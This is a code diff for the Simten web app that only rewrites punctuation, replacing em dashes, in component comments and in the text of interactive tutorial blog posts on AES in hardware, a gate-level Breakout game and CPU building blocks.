               className="inline-flex items-center gap-2.5 text-foreground transition-colors hover:text-foreground/80"
             >
               <Logo size={28} />

--- a/apps/web/src/components/SiteHeader.tsx
+++ b/apps/web/src/components/SiteHeader.tsx
@@ -11,7 +11,7 @@ import { ThemeToggle } from '@/components/ThemeToggle';
  * controls on /editor and /cpu/rv32i.
  *
  * `brandHref` makes the brand a plain external `<a>` instead of a router
- * `<Link>` — used by the standalone local MCP viewer, which has no router.
+ * `<Link>`, used by the standalone local MCP viewer, which has no router.
  */
 export function SiteHeader({
   right,
@@ -35,11 +35,11 @@ export function SiteHeader({
       className={`${sticky ? 'sticky top-0 z-40' : ''} flex h-14 w-full shrink-0 items-center justify-between gap-3 bg-background/90 px-4 backdrop-blur`}
     >
       {brandHref ? (
-        <a href={brandHref} className={brandClassName} aria-label="Simten — home">
+        <a href={brandHref} className={brandClassName} aria-label="Simten home">
           {brand}
         </a>
       ) : (
-        <Link to="/" className={brandClassName} aria-label="Simten — home">
+        <Link to="/" className={brandClassName} aria-label="Simten home">
           {brand}
         </Link>
       )}

--- a/apps/web/src/components/SiteNavLinks.tsx
+++ b/apps/web/src/components/SiteNavLinks.tsx
@@ -6,7 +6,7 @@ import { createPortal } from 'react-dom';
 /**
  * Standard nav rendered on the right of SiteHeader for content pages.
  *
- * Desktop (sm+): inline links — Blog | Learn | Docs | [GitHub icon].
+ * Desktop (sm+): inline links: Blog | Learn | Docs | [GitHub icon].
  * Mobile (< sm): a hamburger button that opens a dropdown panel with the same
  * links, so they don't get squished against the ThemeToggle on narrow screens.
  *
@@ -77,7 +77,7 @@ export function SiteNavLinks() {
       </nav>
 
       {/* Mobile hamburger. order-last pushes it past the ThemeToggle (rendered
-          after {right} in SiteHeader) so it sits on the far-right edge — the
+          after {right} in SiteHeader) so it sits on the far-right edge; the
           conventional, thumb-reachable spot. Hidden on desktop, so order is moot
           there. */}
       <button
@@ -90,7 +90,7 @@ export function SiteNavLinks() {
         {open ? <X className="size-5" /> : <Menu className="size-5" />}
       </button>
 
-      {/* Mobile dropdown — portalled to body, sits just below the h-14 header */}
+      {/* Mobile dropdown, portalled to body, sits just below the h-14 header */}
       {mounted &&
         open &&
         createPortal(

--- a/apps/web/src/components/TruthTable.tsx
+++ b/apps/web/src/components/TruthTable.tsx
@@ -4,7 +4,7 @@
  * Takes column metadata and a positional row matrix; renders a styled,
  * accessible <table> in a card that matches the CircuitEmbed aesthetic
  * (theme tokens from packages/embed/src/styles/embed.css). No simulator
- * coupling — data is hand-coded at the call site.
+ * coupling; data is hand-coded at the call site.
  *
  * Plan: ~/.claude/plans/yeah-lets-mae-a-crystalline-cookie.md
  */
@@ -31,7 +31,7 @@ export interface TruthTableProps {
   /** Optional header band above the table. Not the accessible name. */
   title?: string;
   /**
-   * Optional small text below the table — renders as a real <caption>
+   * Optional small text below the table; renders as a real <caption>
    * element for screen readers, positioned at the bottom via CSS.
    */
   caption?: string;
@@ -149,7 +149,7 @@ export function TruthTable({
 
 /**
  * Render a single truth-table cell. For 0/1 bit values we style the "1"
- * as a tinted badge — output 1s use a brighter accent so the pattern of
+ * as a tinted badge; output 1s use a brighter accent so the pattern of
  * which inputs produce a 1 at each output reads at a glance. 0s are
  * dimmed so the active cells stand out instead of every cell carrying
  * equal weight.
@@ -176,7 +176,7 @@ function BitCell({ value, active }: { value: string | number; active: boolean })
       </span>
     );
   }
-  // Non-binary cell (string label, multi-bit value) — render plain.
+  // Non-binary cell (string label, multi-bit value): render plain.
   return <span className="text-[var(--embed-text-primary)]">{value}</span>;
 }
 
@@ -206,7 +206,7 @@ export function computeActiveRow(
     .filter(({ col }) => col.group === 'input');
 
   // Walk the inputs imperatively so currentBits narrows to number[] via
-  // control flow — .some() doesn't propagate the null-narrowing.
+  // control flow; .some() doesn't propagate the null-narrowing.
   const currentBits: number[] = [];
   for (const { col } of inputCols) {
     const bit = readPortBit(portValues, col.name);

--- a/apps/web/src/features/blog/BlogFooter.tsx
+++ b/apps/web/src/features/blog/BlogFooter.tsx
@@ -9,7 +9,7 @@ interface BlogFooterProps {
  * Per-post footer rendered at the bottom of every blog post body.
  * Holds post-specific CTAs (open the editor, go to the next post, back to
  * the index). The site-wide brand + nav footer is SiteFooter, mounted in
- * __root.tsx — this component sits ABOVE it.
+ * __root.tsx; this component sits ABOVE it.
  */
 export function BlogFooter({ slug }: BlogFooterProps) {
   const currentIndex = posts.findIndex((p) => p.slug === slug);

--- a/apps/web/src/features/blog/aes-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/aes-in-hardware/sections/HeroSection.tsx
@@ -20,8 +20,8 @@ export function HeroSection() {
 
       <p className="text-lg text-gray-500 dark:text-gray-300 leading-relaxed mb-4">
         AES-GCM encrypts roughly 80% of HTTPS traffic today. It&rsquo;s so ubiquitous that Intel,
-        AMD, and ARM all built dedicated silicon to accelerate it — <strong>AES-NI</strong>, a set
-        of CPU instructions that do one full round in a single clock cycle.
+        AMD, and ARM all built dedicated silicon to accelerate it: <strong>AES-NI</strong>, a set of
+        CPU instructions that do one full round in a single clock cycle.
       </p>
       <p className="text-gray-500 dark:text-gray-400 leading-relaxed mb-4">
         Why does AES need hardware help when something like{' '}
@@ -37,9 +37,9 @@ export function HeroSection() {
         attacks.
       </p>
       <p className="text-gray-500 dark:text-gray-400 leading-relaxed">
-        In this post, you&rsquo;ll build the three hardware operations that make up one AES round —
-        SubBytes, XTime (the GF(2<sup>8</sup>) multiply at the heart of MixColumns), and the full
-        MixColumns step — and verify each against the FIPS 197 test vectors.
+        In this post, you&rsquo;ll build the three hardware operations that make up one AES round
+        (SubBytes, XTime, the GF(2<sup>8</sup>) multiply at the heart of MixColumns, and the full
+        MixColumns step), and verify each against the FIPS 197 test vectors.
       </p>
     </section>
   );

--- a/apps/web/src/features/blog/aes-in-hardware/sections/MixColumnsSection.tsx
+++ b/apps/web/src/features/blog/aes-in-hardware/sections/MixColumnsSection.tsx
@@ -23,18 +23,18 @@ r3 = 3·s0 ⊕ s1   ⊕ s2   ⊕ 2·s3`}
         </pre>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Where <code>2·x</code> is XTime(x) and <code>3·x</code> is XTime(x)&nbsp;⊕&nbsp;x.
-          That&rsquo;s it — four XTime operations and twelve XOR gates per column. Four columns =
+          That&rsquo;s it: four XTime operations and twelve XOR gates per column. Four columns =
           sixteen XTimes and forty-eight XORs for the full MixColumns step.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The goal of this matrix is total diffusion: every output byte depends on every input byte.
           Change one input bit, and all four outputs change. That&rsquo;s what makes AES
-          cryptographically strong after just a few rounds — SubBytes provides non-linearity,
+          cryptographically strong after just a few rounds. SubBytes provides non-linearity,
           MixColumns ensures that non-linearity spreads everywhere.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The circuit below is verified against FIPS 197, Appendix B. The inputs are pre-loaded with
-          the official test vector — you can change them to explore other values:
+          the official test vector, and you can change them to explore other values:
         </p>
         <div className="rounded-lg border border-emerald-800/40 bg-emerald-900/10 p-4">
           <div className="text-xs text-emerald-400 font-semibold mb-2 font-mono">

--- a/apps/web/src/features/blog/aes-in-hardware/sections/SubBytesSection.tsx
+++ b/apps/web/src/features/blog/aes-in-hardware/sections/SubBytesSection.tsx
@@ -14,12 +14,12 @@ export function SubBytesSection() {
           The first step of every AES round is <strong>SubBytes</strong>: each of the 16 bytes in
           the state matrix is independently replaced using a fixed 256-entry lookup table called the
           S-box. Input byte 0x53 always maps to 0xed. Input 0x00 always maps to 0x63. The mapping is
-          non-linear — that&rsquo;s the entire point.
+          non-linear, and that is the entire point.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           In hardware, this is a ROM. You present an 8-bit address, and one clock edge later you
           have your 8-bit substitution. That&rsquo;s it. The non-linearity that makes AES
-          cryptographically strong comes entirely from this table lookup — there&rsquo;s no ALU
+          cryptographically strong comes entirely from this table lookup. There&rsquo;s no ALU
           operation that could replace it cheaply.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
@@ -60,7 +60,7 @@ export function SubBytesSection() {
         </h3>
         <p className="text-gray-500 dark:text-gray-400 text-sm leading-relaxed">
           The S-box is derived from multiplicative inverses in GF(2<sup>8</sup>) followed by an
-          affine transformation. You could compute this on the fly with a GF inverter circuit — but
+          affine transformation. You could compute this on the fly with a GF inverter circuit, but
           it would take dozens of gates and add latency to every single round. A ROM trades area for
           speed, which is exactly the right trade-off in a pipelined AES core. A 256&times;8-bit ROM
           is tiny in silicon terms: just 2048 bits of storage.

--- a/apps/web/src/features/blog/aes-in-hardware/sections/WhyHardwareSection.tsx
+++ b/apps/web/src/features/blog/aes-in-hardware/sections/WhyHardwareSection.tsx
@@ -4,8 +4,8 @@ export function WhyHardwareSection() {
       <h2 className="text-3xl font-bold text-gray-900 dark:text-white mb-4">Why AES-NI Exists</h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          One AES-128 round applies all four steps — SubBytes, ShiftRows, MixColumns, AddRoundKey —
-          to a 128-bit state. Then you do it nine more times, plus a final round. In software on a
+          One AES-128 round applies all four steps (SubBytes, ShiftRows, MixColumns, AddRoundKey) to
+          a 128-bit state. Then you do it nine more times, plus a final round. In software on a
           general-purpose CPU, each round requires:
         </p>
         <ul className="text-gray-600 dark:text-gray-300 space-y-2 ml-4">
@@ -43,27 +43,26 @@ export function WhyHardwareSection() {
             Intel&rsquo;s <code>AESENC</code> instruction, introduced in 2010, performs one full AES
             round in a single clock cycle. The S-box becomes a hardware lookup with no memory
             traffic. ShiftRows is just wiring. MixColumns uses dedicated GF(2<sup>8</sup>)
-            multiplier circuits. The entire datapath is constant-time by construction — there are no
+            multiplier circuits. The entire datapath is constant-time by construction: there are no
             branches, no memory accesses, no cache lines to leak.
           </p>
           <p className="text-gray-600 dark:text-gray-300 text-sm leading-relaxed mt-3">
             Modern AES-NI pipelines the ten rounds with 3&ndash;4 cycle latency, achieving 1&ndash;2
             clock cycles per byte of throughput. On a 3 GHz core that&rsquo;s roughly 10&ndash;20
-            GB/s — fast enough that TLS overhead is effectively zero on any server with a modern
-            CPU.
+            GB/s, fast enough that TLS overhead is effectively zero on any server with a modern CPU.
           </p>
         </div>
 
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The contrast with ChaCha20 is stark. ChaCha20 was designed to be fast <em>without</em>{' '}
-          hardware — its ARX operations (add, rotate, XOR) are cheap on any CPU. AES was designed
-          for hardware from day one, and performs poorly without it. This is why Cloudflare and
-          others deploy ChaCha20-Poly1305 for clients that lack AES-NI (older mobile devices, IoT)
-          while defaulting to AES-GCM everywhere else.
+          hardware, because its ARX operations (add, rotate, XOR) are cheap on any CPU. AES was
+          designed for hardware from day one, and performs poorly without it. This is why Cloudflare
+          and others deploy ChaCha20-Poly1305 for clients that lack AES-NI (older mobile devices,
+          IoT) while defaulting to AES-GCM everywhere else.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The MixColumns circuit you just built is the exact computation that AES-NI performs in
-          dedicated silicon — minus the pipelining and the parallel SubBytes lookup. In a real ASIC
+          dedicated silicon, minus the pipelining and the parallel SubBytes lookup. In a real ASIC
           implementation, you&rsquo;d unroll all ten rounds and instantiate four MixColumn blocks in
           parallel (one per column), giving you a fully pipelined single-cycle AES core.
         </p>

--- a/apps/web/src/features/blog/aes-in-hardware/sections/XTimeSection.tsx
+++ b/apps/web/src/features/blog/aes-in-hardware/sections/XTimeSection.tsx
@@ -14,16 +14,16 @@ export function XTimeSection() {
           MixColumns needs to multiply bytes together, but AES uses arithmetic in{' '}
           <strong>
             GF(2<sup>8</sup>)
-          </strong>{' '}
-          — Galois Field of 256 elements. There&rsquo;s no normal multiply here. The core operation
-          is <strong>XTime</strong>: multiplication by 2.
+          </strong>
+          , the Galois Field of 256 elements. There&rsquo;s no normal multiply here. The core
+          operation is <strong>XTime</strong>: multiplication by 2.
         </p>
         <pre className="bg-gray-100 dark:bg-gray-900/80 border border-gray-700/50 rounded-lg p-4 text-sm font-mono text-gray-200 overflow-x-auto">
           {`XTime(x) = (x << 1) XOR (bit7 ? 0x1b : 0)`}
         </pre>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Left-shift by one (multiply by 2 in the polynomial ring). If the MSB was set before the
-          shift, the result has overflowed 8 bits — XOR with <code>0x1b</code> to reduce it back.
+          shift, the result has overflowed 8 bits, so XOR with <code>0x1b</code> to reduce it back.
           That value is the AES irreducible polynomial{' '}
           <code>
             x<sup>8</sup> + x<sup>4</sup> + x<sup>3</sup> + x + 1
@@ -33,7 +33,7 @@ export function XTimeSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           In hardware this is just a one-bit shift, a single bit-test, and one conditional XOR. The
-          circuit below does exactly that — follow the path from the left-shifter through the Mux
+          circuit below does exactly that: follow the path from the left-shifter through the Mux
           (controlled by bit 7) to the final XOR.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
@@ -54,7 +54,7 @@ export function XTimeSection() {
                 {dec} <span className="text-gray-500">({hex})</span>
               </div>
               <div className="text-gray-600 text-xs mt-1">
-                {note} — {note === 'bit7=0' ? 'no reduction' : 'reduction XOR 0x1b'}
+                {note} &middot; {note === 'bit7=0' ? 'no reduction' : 'reduction XOR 0x1b'}
               </div>
               <div className="text-gray-500 text-xs mt-2 mb-1">output</div>
               <div className="text-emerald-400">

--- a/apps/web/src/features/blog/breakout-in-hardware/BreakoutDemo.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/BreakoutDemo.tsx
@@ -120,7 +120,7 @@ export function BreakoutDemo() {
         </svg>
       </div>
 
-      {/* Touch controls — mobile only */}
+      {/* Touch controls, mobile only */}
       <div className="sm:hidden py-4 border-t border-gray-700/50 bg-gray-100 dark:bg-gray-900/90">
         <LRPad onDirection={sendDirection} />
       </div>

--- a/apps/web/src/features/blog/breakout-in-hardware/breakout.verify.ts
+++ b/apps/web/src/features/blog/breakout-in-hardware/breakout.verify.ts
@@ -2,7 +2,7 @@
  * Gameplay testbench for the Breakout circuit.
  *
  * Drives only the top-level ports (`scan_addr`, `keyboard`, `pixel_out`,
- * `is_filling`) — the same surface the browser demo uses — and reads the screen
+ * `is_filling`), the same surface the browser demo uses, and reads the screen
  * back, then asserts behavioural invariants of Breakout: the ball is in motion,
  * a brick wall is drawn and the ball rebounds off its face without tunnelling,
  * the paddle tracks the held key and clamps to the walls, and losing the ball
@@ -27,7 +27,7 @@ declareOracle({
   tier: 'C',
   type: 'Breakout gameplay invariants (motion / wall / rebound / input / death-refill)',
   independence_basis:
-    "Expected behaviour comes from the rules of Breakout — the ball is always in flight and on the field, a brick wall is drawn and the ball rebounds off its face rather than passing through it, the paddle moves toward the held key and stops at the walls, and losing the ball respawns it and redraws the full wall — asserted by driving the public ports and reading pixel_out/is_filling. None of these restate the circuit's internal wiring.",
+    "Expected behaviour comes from the rules of Breakout: the ball is always in flight and on the field, a brick wall is drawn and the ball rebounds off its face rather than passing through it, the paddle moves toward the held key and stops at the walls, and losing the ball respawns it and redraws the full wall. This is asserted by driving the public ports and reading pixel_out/is_filling. None of these restate the circuit's internal wiring.",
   evidence: 'power-on wall draw + trajectory + tunnelling watch + paddle sweep + death-refill',
 });
 
@@ -140,7 +140,7 @@ verify.exhaustive('holding RIGHT moves paddle right and clamps', [1], () => {
 });
 
 // Invariant 5: losing the ball asserts is_filling (the redraw), refills the wall
-// fully, and respawns the ball — real "instant refill on death" (the demo bursts
+// fully, and respawns the ball: real "instant refill on death" (the demo bursts
 // the redraw; here we just tick through it).
 verify.exhaustive('death refills the wall fully and respawns the ball', [1], () => {
   const s = simulate(Breakout);

--- a/apps/web/src/features/blog/breakout-in-hardware/circuits.ts
+++ b/apps/web/src/features/blog/breakout-in-hardware/circuits.ts
@@ -4,10 +4,10 @@
  *
  * Synthesizable, snake-style I/O with a combinational raster render (like a real
  * raster display): the browser drives `scan_addr`, which splits into
- * `scanX`/`scanY` and feeds the pixel logic straight to `pixel_out` — no
+ * `scanX`/`scanY` and feeds the pixel logic straight to `pixel_out`, with no
  * framebuffer, so a render is one combinational sweep and never advances the
  * clock. Game state advances one step per clock tick (throttled by the ball/
- * paddle speed counters), so a game step is a single tick — the browser ticks a
+ * paddle speed counters), so a game step is a single tick: the browser ticks a
  * handful of times per animation frame, exactly like snake. Paddle input arrives
  * on the top-level `keyboard` bus.
  */
@@ -565,7 +565,7 @@ export const Breakout = circuit('Breakout', {
     actualDY.out.to(ballDY.data),
     // A miss is handled on the ball's move pulse: onMissVblank = ballUpdate AND
     // ballMissed, so the reset and the wall refill fire together on the same
-    // step — for both game_en=1 (browser) and a pulsed game_en (FPGA). The ball
+    // step, for both game_en=1 (browser) and a pulsed game_en (FPGA). The ball
     // is reset via ballAndFill on that pulse (before the fill's hold engages).
     ballUpdate.out.to(ballAndFill.a, onMissVblank.a),
     notFilling.out.to(ballAndFill.b),

--- a/apps/web/src/features/blog/breakout-in-hardware/sections/BallSection.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/sections/BallSection.tsx
@@ -12,18 +12,16 @@ export function BallSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           But the ball would be impossibly fast if it moved every clock. A{' '}
-          <strong className="text-gray-900 dark:text-white">clock divider</strong> &mdash; a counter
-          that counts 0, 1, 2, 3, then resets &mdash; generates an enable signal that fires once
-          every 4 clocks. The ball&rsquo;s position registers only update when this enable signal is
-          high. The paddle runs off its own divider at twice the rate, giving the player a speed
-          advantage.
+          <strong className="text-gray-900 dark:text-white">clock divider</strong>, a counter that
+          counts 0, 1, 2, 3, then resets, generates an enable signal that fires once every 4 clocks.
+          The ball&rsquo;s position registers only update when this enable signal is high. The
+          paddle runs off its own divider at twice the rate, giving the player a speed advantage.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Clock dividers are fundamental hardware. Every digital system uses them: your CPU&rsquo;s
           peripheral bus runs slower than the core, USB runs at 12MHz from a 48MHz source, VGA
-          timing derives from a pixel clock. Here, it&rsquo;s just a counter and a comparator
-          &mdash; when the counter equals the max value, the enable goes high and the counter
-          resets.
+          timing derives from a pixel clock. Here, it&rsquo;s just a counter and a comparator: when
+          the counter equals the max value, the enable goes high and the counter resets.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Wall bouncing is handled <em>before</em> computing the next position. If the ball is at

--- a/apps/web/src/features/blog/breakout-in-hardware/sections/BreakoutSection.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/sections/BreakoutSection.tsx
@@ -36,14 +36,14 @@ export function BreakoutSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Press <strong className="text-gray-900 dark:text-white">Run</strong> and use the arrow
-          keys to move the paddle. The ball moves every 4th clock &mdash; a hardware clock divider
+          keys to move the paddle. The ball moves every 4th clock, using a hardware clock divider
           that gives you time to react. When the ball hits a brick, it disappears and the ball
           bounces back. Lose the ball and the wall redraws itself, then a fresh ball launches.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Everything you see is running on the same simulator that powers all the circuits in this
-          blog. No CPU, no software &mdash; just gates, registers, and one DualPortRAM for the wall.
-          And it&rsquo;s all synthesizable: the exact same circuit exports to Verilog and runs on an
+          blog. No CPU, no software, just gates, registers, and one DualPortRAM for the wall. And
+          it&rsquo;s all synthesizable: the exact same circuit exports to Verilog and runs on an
           FPGA.
         </p>
       </div>
@@ -61,8 +61,8 @@ export function BreakoutSection() {
           The circuit uses the same fundamental building blocks as everything else on this site:
           registers for state, comparators for collision detection, muxes for selecting between
           values, and adders for position arithmetic. The raster scan is just a counter and a bank
-          of comparators &mdash; the same on-the-fly pixel generation a VGA controller uses, scaled
-          to a 32&times;16 screen.
+          of comparators, the same on-the-fly pixel generation a VGA controller uses, scaled to a
+          32&times;16 screen.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/breakout-in-hardware/sections/BricksSection.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/sections/BricksSection.tsx
@@ -5,22 +5,22 @@ export function BricksSection() {
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The 128 bricks fill the top four rows (Y &lt; 4). Each one is a single bit in a
-          DualPortRAM &mdash; 1 if the brick is alive, 0 if it has been destroyed. That one bit per
-          cell is the entire game state for the wall.
+          DualPortRAM: 1 if the brick is alive, 0 if it has been destroyed. That one bit per cell is
+          the entire game state for the wall.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Collision reads the RAM at the ball&rsquo;s <em>next</em> position. If that cell is alive
           and in the brick rows, it&rsquo;s a hit: the Y velocity flips and the same cell is written
           to 0, so the brick vanishes. The bounce is applied to the position on the same clock, so
-          the ball reflects off the face of the wall instead of sinking into it &mdash; it only eats
-          a row deeper once the bricks in front of it are gone.
+          the ball reflects off the face of the wall instead of sinking into it, and it only eats a
+          row deeper once the bricks in front of it are gone.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          One DualPortRAM does double duty. Port A serves the game logic &mdash; reading the
-          ball&rsquo;s next cell for collision and clearing hit bricks. Port B serves the picture
-          &mdash; the raster scan reads the brick under the current pixel to decide whether to light
-          it. The alive-bits are both the state and the image; there&rsquo;s no separate structure
-          tracking which bricks are left.
+          One DualPortRAM does double duty. Port A serves the game logic, reading the ball&rsquo;s
+          next cell for collision and clearing hit bricks. Port B serves the picture: the raster
+          scan reads the brick under the current pixel to decide whether to light it. The alive-bits
+          are both the state and the image; there&rsquo;s no separate structure tracking which
+          bricks are left.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/breakout-in-hardware/sections/HeroSection.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/sections/HeroSection.tsx
@@ -6,9 +6,9 @@ export function HeroSection() {
           Breakout in Hardware
         </h1>
         <p className="mt-6 text-xl text-gray-500 dark:text-gray-300 leading-relaxed">
-          A complete Breakout game built entirely from logic gates, registers, and memory &mdash; a
-          6-pixel paddle, a bouncing ball, and 128 destructible bricks, drawn by a combinational
-          raster scan the way a real display works. No CPU, no software, just digital circuits.
+          A complete Breakout game built entirely from logic gates, registers, and memory: a 6-pixel
+          paddle, a bouncing ball, and 128 destructible bricks, drawn by a combinational raster scan
+          the way a real display works. No CPU, no software, just digital circuits.
         </p>
         <div className="mt-8 flex items-center gap-4 text-sm text-gray-500 dark:text-gray-400">
           <span>Interactive tutorial</span>
@@ -23,16 +23,16 @@ export function HeroSection() {
           </span>
         </div>
 
-        {/* Original Breakout — Wozniak's hardware implementation */}
+        {/* Original Breakout, Wozniak's hardware implementation */}
         <div className="mt-10">
           <p className="text-sm text-gray-500 dark:text-gray-500 mb-3">
-            Steve Wozniak built the original Breakout in hardware for Atari in 1976 &mdash; no CPU,
+            Steve Wozniak built the original Breakout in hardware for Atari in 1976, with no CPU,
             just TTL chips. Here&rsquo;s what it looked like:
           </p>
           <div className="aspect-video rounded-xl overflow-hidden border border-gray-700/50">
             <iframe
               src="https://www.youtube.com/embed/17eUExffa5w"
-              title="Original Breakout — Atari 1976"
+              title="Original Breakout, Atari 1976"
               allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
               allowFullScreen
               className="w-full h-full"

--- a/apps/web/src/features/blog/breakout-in-hardware/sections/PaddleSection.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/sections/PaddleSection.tsx
@@ -14,10 +14,10 @@ export function PaddleSection() {
           the boundaries, and two muxes override the result if it would go out of bounds.
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          This is the same pattern used in every hardware input system &mdash; a comparator bank
-          decodes the input code, combinational logic computes the new position, and boundary
-          clamping prevents invalid state. No if-statements, no software &mdash; just gates
-          selecting between values.
+          This is the same pattern used in every hardware input system: a comparator bank decodes
+          the input code, combinational logic computes the new position, and boundary clamping
+          prevents invalid state. No if-statements, no software, just gates selecting between
+          values.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/breakout-in-hardware/sections/PipelineSection.tsx
+++ b/apps/web/src/features/blog/breakout-in-hardware/sections/PipelineSection.tsx
@@ -7,7 +7,7 @@ export function PipelineSection() {
           There&rsquo;s no framebuffer. Storing all 512 pixels and rewriting them every frame would
           burn memory and cycles on a picture the logic can regenerate for free. Instead the screen
           is drawn the way a real display is: a scan counter walks every pixel address in turn, and
-          for each one, combinational logic answers a single question &mdash; is this pixel lit?
+          for each one, combinational logic answers a single question: is this pixel lit?
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The <code className="text-sm">scan_addr</code> input splits into X (the low 5 bits,
@@ -49,10 +49,10 @@ export function PipelineSection() {
         </p>
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           The one thing that <em>does</em> need memory writes is the wall itself, and RAM has no
-          reset line. So at power-on &mdash; and again each time you lose a ball &mdash; a small
-          fill counter walks the 128 brick cells and writes them alive, one per clock. At the
-          FPGA&rsquo;s clock rate that whole redraw is a few microseconds: instant. The demo just
-          fast-forwards those clocks so you see the same thing in the browser.
+          reset line. So at power-on, and again each time you lose a ball, a small fill counter
+          walks the 128 brick cells and writes them alive, one per clock. At the FPGA&rsquo;s clock
+          rate that whole redraw is a few microseconds: instant. The demo just fast-forwards those
+          clocks so you see the same thing in the browser.
         </p>
       </div>
     </section>

--- a/apps/web/src/features/blog/breakout-in-hardware/useBreakoutSimulator.ts
+++ b/apps/web/src/features/blog/breakout-in-hardware/useBreakoutSimulator.ts
@@ -14,7 +14,7 @@ export function useBreakoutSimulator() {
   const [pixels, setPixels] = useState<number[]>(new Array(PIXELS).fill(0));
 
   // Refresh the screen after every tick: sweep scan_addr 0..511 and read
-  // pixel_out combinationally (one sandbox round-trip, clock not advanced) —
+  // pixel_out combinationally (one sandbox round-trip, clock not advanced),
   // the same read path snake uses.
   useEffect(() => {
     if (!sim.ready) return;
@@ -29,7 +29,7 @@ export function useBreakoutSimulator() {
 
   // Hold the game-clock enable high: in the browser the game advances one step
   // per tick (we throttle the tick rate). On the FPGA this input is pulsed at
-  // ~30 Hz instead, while the clock — and the wall-fill FSM — run at full speed.
+  // ~30 Hz instead, while the clock and the wall-fill FSM run at full speed.
   useEffect(() => {
     if (sim.ready) sim.setNode('game_en', 1);
   }, [sim.ready, sim.setNode]);
@@ -62,7 +62,7 @@ export function useBreakoutSimulator() {
   // refresh is driven by the cycleCount effect above. If a game step lands the
   // circuit in a wall redraw (the fill FSM, high on `is_filling`, after a death
   // or at power-on), burst through its ~128 clocks in one shot so the wall snaps
-  // back full instantly — as it does on the FPGA at MHz. A recursive timeout
+  // back full instantly, as it does on the FPGA at MHz. A recursive timeout
   // (not setInterval) keeps the async tick/scan/burst from overlapping.
   useEffect(() => {
     if (!isRunning || !sim.ready) return;

--- a/apps/web/src/features/blog/building-a-cpu/CPU6502Demo.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/CPU6502Demo.tsx
@@ -7,7 +7,7 @@ const STARTER_TEMPLATE = `\
 /*
  * Write C code for the 6502 simulator.
  * Console output: write bytes to address $F000
- * No stdlib available — use the CONSOLE macro.
+ * No stdlib available, so use the CONSOLE macro.
  */
 #define CONSOLE (*(volatile unsigned char*)0xF000)
 
@@ -234,7 +234,7 @@ export function CPU6502Demo() {
                 </pre>
               )}
               <div className="text-[10px] text-gray-500 dark:text-gray-500 leading-snug">
-                No standard library (printf, etc.) — use{' '}
+                No standard library (printf, etc.). Use{' '}
                 <code className="text-gray-500 dark:text-gray-400">CONSOLE = &apos;c&apos;;</code>{' '}
                 for output. Program must end with{' '}
                 <code className="text-gray-500 dark:text-gray-400">while(1);</code> to halt. ROM

--- a/apps/web/src/features/blog/building-a-cpu/circuits.ts
+++ b/apps/web/src/features/blog/building-a-cpu/circuits.ts
@@ -40,7 +40,7 @@ export const SRLatch = circuit('SRLatch', {
   ],
 });
 
-// D Flip-Flop is a primitive — use it directly; auto-harness handles Switch/Led
+// D Flip-Flop is a primitive, so use it directly; auto-harness handles Switch/Led
 // For display, we just show the DFlipFlop itself
 
 export const Reg4 = circuit('Reg4', {
@@ -144,7 +144,7 @@ export const ALU1 = circuit('ALU1', {
   ],
 });
 
-// RAM demo is self-contained (no ports) — auto-harness skips it
+// RAM demo is self-contained (no ports), so auto-harness skips it
 export const DemoRAM = circuit('DemoRAM', {
   nodes: {
     addr: Input(),

--- a/apps/web/src/features/blog/building-a-cpu/sections/ALUSection.tsx
+++ b/apps/web/src/features/blog/building-a-cpu/sections/ALUSection.tsx
@@ -9,7 +9,7 @@ export function ALUSection() {
       </h2>
       <div className="prose-invert space-y-6">
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
-          An adder can only add. A real CPU needs to do logic too &mdash; AND, OR, XOR. The{' '}
+          An adder can only add. A real CPU needs to do logic too: AND, OR, XOR. The{' '}
           <strong className="text-gray-900 dark:text-white">Arithmetic Logic Unit</strong> (ALU)
           computes <em>all</em> of these in parallel and uses a{' '}
           <strong className="text-gray-900 dark:text-white">multiplexer</strong> to pick the result
@@ -23,8 +23,8 @@ export function ALUSection() {
         <p className="text-gray-600 dark:text-gray-300 leading-relaxed">
           Chain 8 of these slices (with carry linking the adders) and you have the complete ALU of
           the 6502. The CPU&rsquo;s control unit just sets the <strong>op</strong> bits based on
-          which instruction it decoded. Same circuit, different operation &mdash; that&rsquo;s what
-          makes it programmable.
+          which instruction it decoded. Same circuit, different operation. That&rsquo;s what makes
+          it programmable.
         </p>
       </div>
 

